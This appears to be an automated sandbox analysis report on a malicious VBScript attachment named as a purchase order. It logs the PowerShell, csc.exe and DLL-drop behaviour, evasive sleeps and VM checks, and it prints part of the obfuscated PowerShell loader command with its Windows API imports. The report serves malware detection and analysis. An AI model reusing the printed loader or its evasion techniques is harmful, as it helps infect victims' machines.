Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_031461C5 push FFFFFFC3h; ret		3_2_03146264
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_03146070 push FFFFFFC3h; ret		3_2_03146174

Compiles C# or VB.Net code

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline			Jump to behavior

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.dll

Jump to dropped file

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 8859

Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3344

Thread sleep time: -10145709240540247s >= -30000s

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.dll

Jump to dropped file

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: wscript.exe, 00000000.00000003.252733876.000001332B549000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $e6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU = Tox
Source: powershell.exe, 00000003.00000002.542110723.00000000057BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: wscript.exe, 00000000.00000003.266492104.000001332BB4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dHe6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU
Source: wscript.exe, 00000000.00000003.266492104.000001332BB4C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.266939098.000001332B839000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.267864017.00000133295FE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.268235777.000001332B731000.00000004.00000020.00020000.00000000.sdmp, PO-08784 xlsx.vbe	Binary or memory string: To3 = To3 & "e6FK3ERR6PWWYlv/0xfK3CaSQEMUgrb1tJmU"
Source: powershell.exe, 00000003.00000002.542110723.00000000057BF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.534323736.0000000005304000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: wscript.exe, 00000000.00000003.266250386.000001332B9AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$thyridia = """ovafadandda-ditsiyfipoteco ro-fltmuyzoppreabdinevefpridenabisetfoilroelnmy fe'boujassuiinnsogud hosmiyfesdetnoeidmsa;vaumosphistnbegau vispuynesbrttuevrmta.harreubensctmaievmsterk.iniinnwhthoeoerafoshpsosejedercavchilicpiebrsdi;trpraudibfollaialcvo bospatalasktgoigacgu licdelswastsunsre prmopesptskhdeymilno1en di{ci[dedanloplgliirmcopopocurbutaf(ef`"""unktoelorsensrepelli3ko2ha`"""fr)ji]vopatudrbunlreimicno kosdrtscatitkriircpo chesaxuntslelyrtyngr sriejnbethu peglietetdetkahfirhveunabrdtrtinispmjeeitsco(riiugnjutcr bepinrskostgunrfi8op2we,raiswnsytan meffirskepsmsuakhdov,priafnhytre drtlieunlcoeno,reitvnmitfo witabrfuesydcyiaf,raisbncotur optmyistmtr)sp;ti[bodkrlfilmeiromunpkeoafrcitsu(ha`"""geuunsseenarwi3su2sc`"""us)ci]nypceutobpeladiefcud sqscotgaaretnaidrcro smebyxdotjaegtrtrnpe blichnadtja pocinlacityepanbrtulttrofosrectirvaemdelenbr(neistngltov siiudnwrkliosprbapre,coicencotme zetcoefrkplnfaore)al;un[mudunlcalheinumfrptyopirbrtki(fo`"""wakwoetwrfanfreunlpr3ru2su`"""st)fr]udpdeualbcaltricrcre cosrutgraaltveitacti vaeslxustboenergenpa diisunoktca ineovxhapsaauhnpldunebrnsavpaistrprotrndrmstehynfetflswotunrsvidanabgwesfi(eriblnretst rerecocytsotdeepo,teichnretsu fobufugalma,biimonbitde inebrnoetafoco)re;ra[pldlalavlfuiafmskpbeoanrsutko(te`"""beuelsjieelrst3mu2fy`"""di)to]popvauanbbrlmaipucos ovsretpeaprtpeiufcso toefoxovtmaenortensl prifrnqutbl ameegnpuubamaucpihpoidilnedbewisiefnfldfrokiwbesso(miihontatfu holmiiovtrahfoeindro,anigencatal hydreifoosubmoosl,meiolntutch poataluvuvanungal)va;tr[emdselkrlgoijamprpcoocrrretst(yo`"""mawbeivinlamcombi.nldselfllhe`"""de)no]ilpopuchbtelomibucfo frsretcoachtudijucsa unepnxretmaekvrlgnel veimenintbr injauoopyhusacesetdicdiagepsutbeuavrouece(idiwenfotex afkpeoandunipofno,seispnretbe unvfaelijbe,friesnwitop abedimchpuntmoisp,ceiunnlatfl birureudaviccytduine)po;no[nodtnlhylouiopmakpdeoberaptir(un`"""opkhmenirdrnamemolgr3sf2el`"""kr)li]scpviugrbbrlriiitcpr resfrtgsairtapipacpo uneuhxkrtsyemarranir skvafobyiopdde imgjulreofabdianalspmmaelimmyovarbryhjsettsuatutanufrsub(snifrnretra suawrnjelepgsksemiud)ou;cy[fiddrlsplclibamanpatocorbotno(si`"""ovkanemirunngaecolpr3co2na`"""gr)pr]moptouhabdrlphiskcna sksmatstasetdiiaicva haelyxfotuneenrbrnco saijunpstak unisnsobvpuacolspipldagcmootodstesupsuamagsuesa(ejiafnhytbi caggaakauudmca)fr;fa[codphlhylunidimtypovorurmitfo(mi`"""unkseelirbenriejulch3sl2an`"""sa)si]ampwhuelbsellaisuckl mtsrbtloasptreifocaj mieunxevtsneforbuncu amiteneftte suhoreovadapbirpleseabildelsoorycac(doikonsltfo sthfrablnbedbi,esihennotrk apfunasplsesol,biidansutsu cohdruconlegba,afitrnnetno 